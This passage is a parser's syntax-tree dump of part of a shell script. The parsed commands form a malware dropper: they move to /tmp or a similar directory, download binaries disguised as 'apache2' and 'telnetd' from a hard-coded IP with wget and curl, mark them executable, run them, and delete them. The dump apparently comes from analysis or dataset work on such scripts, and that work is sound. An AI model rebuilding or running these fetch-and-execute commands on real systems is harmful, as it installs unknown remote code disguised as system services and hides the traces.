    WordNode(lineno=13, pos=(1964, 1968), word='wget'),
    WordNode(lineno=13, pos=(1969, 1997), word='http://185.165.29.82/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1997, 1998)),
  CommandNode(lineno=13, pos=(1999, 2035), parts=[
    WordNode(lineno=13, pos=(1999, 2003), word='curl'),
    WordNode(lineno=13, pos=(2004, 2006), word='-O'),
    WordNode(lineno=13, pos=(2007, 2035), word='http://185.165.29.82/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2035, 2036)),
  CommandNode(lineno=13, pos=(2037, 2053), parts=[
    WordNode(lineno=13, pos=(2037, 2042), word='chmod'),
    WordNode(lineno=13, pos=(2043, 2045), word='+x'),
    WordNode(lineno=13, pos=(2046, 2053), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2053, 2054)),
  CommandNode(lineno=13, pos=(2055, 2064), parts=[
    WordNode(lineno=13, pos=(2055, 2064), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(2064, 2065)),
  CommandNode(lineno=13, pos=(2066, 2080), parts=[
    WordNode(lineno=13, pos=(2066, 2068), word='rm'),
    WordNode(lineno=13, pos=(2069, 2072), word='-rf'),
    WordNode(lineno=13, pos=(2073, 2080), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(2081, 2252), parts=[
  CommandNode(lineno=14, pos=(2081, 2088), parts=[
    WordNode(lineno=14, pos=(2081, 2083), word='cd'),
    WordNode(lineno=14, pos=(2084, 2088), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2089, 2091)),
  CommandNode(lineno=14, pos=(2092, 2103), parts=[
    WordNode(lineno=14, pos=(2092, 2094), word='cd'),
    WordNode(lineno=14, pos=(2095, 2103), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2104, 2106)),
  CommandNode(lineno=14, pos=(2107, 2114), parts=[
    WordNode(lineno=14, pos=(2107, 2109), word='cd'),
    WordNode(lineno=14, pos=(2110, 2114), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2115, 2117)),
  CommandNode(lineno=14, pos=(2118, 2126), parts=[
    WordNode(lineno=14, pos=(2118, 2120), word='cd'),
    WordNode(lineno=14, pos=(2121, 2126), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(2127, 2129)),
  CommandNode(lineno=14, pos=(2130, 2134), parts=[
    WordNode(lineno=14, pos=(2130, 2132), word='cd'),
    WordNode(lineno=14, pos=(2133, 2134), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2134, 2135)),
  CommandNode(lineno=14, pos=(2136, 2169), parts=[
    WordNode(lineno=14, pos=(2136, 2140), word='wget'),
    WordNode(lineno=14, pos=(2141, 2169), word='http://185.165.29.82/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2169, 2170)),
  CommandNode(lineno=14, pos=(2171, 2207), parts=[
    WordNode(lineno=14, pos=(2171, 2175), word='curl'),
    WordNode(lineno=14, pos=(2176, 2178), word='-O'),
    WordNode(lineno=14, pos=(2179, 2207), word='http://185.165.29.82/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2207, 2208)),
  CommandNode(lineno=14, pos=(2209, 2225), parts=[
    WordNode(lineno=14, pos=(2209, 2214), word='chmod'),
    WordNode(lineno=14, pos=(2215, 2217), word='+x'),
    WordNode(lineno=14, pos=(2218, 2225), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2225, 2226)),
  CommandNode(lineno=14, pos=(2227, 2236), parts=[
    WordNode(lineno=14, pos=(2227, 2236), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(2236, 2237)),
  CommandNode(lineno=14, pos=(2238, 2252), parts=[
    WordNode(lineno=14, pos=(2238, 2240), word='rm'),
    WordNode(lineno=14, pos=(2241, 2244), word='-rf'),
    WordNode(lineno=14, pos=(2245, 2252), word='telnetd'),
  ]),
])
